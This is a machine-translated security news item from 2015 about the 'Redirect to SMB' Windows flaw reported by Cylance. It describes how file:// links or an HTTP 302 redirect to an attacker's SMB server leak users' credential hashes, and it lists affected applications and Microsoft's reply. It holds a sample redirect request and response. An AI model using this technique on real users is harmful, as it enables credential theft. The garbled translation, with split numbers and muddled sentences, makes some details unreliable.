Windows exposure“redirect SMB”vulnerability, the impact of Win10, including all versions-bug warning-the black bar safety net

ID MYHACK58:62201561203
Type myhack58
Reporter 佚名
Modified 2015-04-15T00:00:00


Recently Cylance company released a Windows System to serious vulnerability, the attacker via the exploit can steal user authentication information. The vulnerability includes the latest Windows 1 0 preview version, including all versions of Windows, as well as Adobe, Apple, Box, Oracle, Symantec, etc. 3 0 Number of companies products. Vulnerability overview The variants of vulnerability can be traced back to 1 9 9 7, by Aaron Spangler found the classic SMB vulnerability derived, this is called“Redirect to SMB”(redirect to the SMB Protocol), security risks will cause the attacker's chance of hijacking user including user name, area and passwords and other sensitive information, and the entire attack process only needs the user to click on a link that is complete. By SMB redirection, an attacker could man in the middle attacks to hijack the authentication session, and then the victim user orientation of the malicious SMB(server message block)server to obtain the user name, domain, and password Hash. More technical details please download the white paper click on the view Cylance white paper Attack A security researcher by the chat client to test for this vulnerability, as shown below: First, the attacker may be directed to visit is the fall of the network server of the user or launch a man in the middle attacks to control the user's network traffic, since when a chat client receives a pointer to a URL of the image, the client will attempt to display the image preview, so the security personnel as long as the Send to file://at the beginning and pointing at a malicious SMB server a file of a picture URL, then the chat client will try to load pictures, so the victim unknowingly automatically connect point to a malicious SMB server URL, and eventually leaked their own system login authentication information. ! Second, in addition, we are also done by HTTP redirection attack test experiments. ! The HTTP request is as follows: GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-US User-Agent: Mozilla/5.0,( Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Endoding: gzip, deflate Host: DNT: 1 Connection: Keep-Alive HTTP/1.1 3 0 2 Found Content-Type: text/html Location: file:// Content-Length: 0 Third, the security researchers also said the vulnerability may be used by any Windows application through the“man in the middle attack”the use of The use of the vulnerability, if an attacker intercepts the backend application to automatically access the remote server requests, such as when a software update in the background, the user even when not click on the link of the case will be black. ! Video demo

Vulnerability The team identified at least 3 1 A exposed to the security risks of the application software, including Adobe Reader, iTunes and IE 1 1 and other widely used applications. A detailed list is as follows: Adobe Reader, Apple QuickTime, Apple iTunes Software Update; Internet Explorer 1 1, Windows Media Player, Excel 2 0 1 0, Microsoft Baseline Security Analyzer, Symantec Norton Security Scan, AVG Free, BitDefender Free, Comodo Antivirus, the . NET Reflector, Maltego CE, Box Sync, TeamView, GitHub for Windows, PyCharm, IntelliJ IDEA, PHP Storm,Oracle JDK 8u31 it. Microsoft response Microsoft is not to release official patch to fix the vulnerability has not yet stand. Microsoft has said that Cylance found that the vulnerability threat is not, as its language so serious. Microsoft in an emailed statement, said: “Man in the middle attack MITM occurs need to meet a number of factors. 2 0 0 9 years, we have been in the Microsoft security research and Defense(the Microsoft Security Research and Defense)blog for guidance updates to help users deal with this potential threat. Windows there are other features such as user authentication Extended Protection(Extended Protection for Authentication), which may be in network connection authentication to play a defensive role, to protect the network connection credentials of the security.”